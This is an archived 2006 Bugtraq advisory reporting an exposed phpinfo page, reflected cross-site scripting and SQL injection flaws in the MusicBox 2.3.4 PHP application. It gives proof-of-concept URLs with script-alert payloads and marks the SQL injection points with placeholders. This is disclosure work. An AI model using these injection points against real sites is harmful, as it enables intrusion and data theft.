| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060724160016.26011.qmail@securityfocus.com> Date: 24 Jul 2006 16:00:16 -0000 From: securityconnection@...il.com To: bugtraq@...urityfocus.com Subject: MusicBox <= 2.3.4 XSS SQL injection Vulnerability MusicBox 2.3.4 http://www.musicboxv2.com ------------ PHPinfo page ------------ /phpinfo.php -------------------------- Cross Site Scripting (XSS) -------------------------- http://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0 http://www.target.xx/index.php?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0 http://www.target.xx/index.php?term=<script>alert(/EllipsisSecurityTest/)</script>&in=song&action=search&start=0 http://www.target.xx/index.php?action=top&show=5&type=<script>alert(/EllipsisSecurityTest/)</script> http://www.target.xx/index.php?action=top&show=<script>alert(/EllipsisSecurityTest/)</script>&type=Artists ------------- SQL injection ------------- http://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQL] http://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists http://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL] ----------------- Ellipsis Security http://www.ellsec.org
Powered by blists - more mailing lists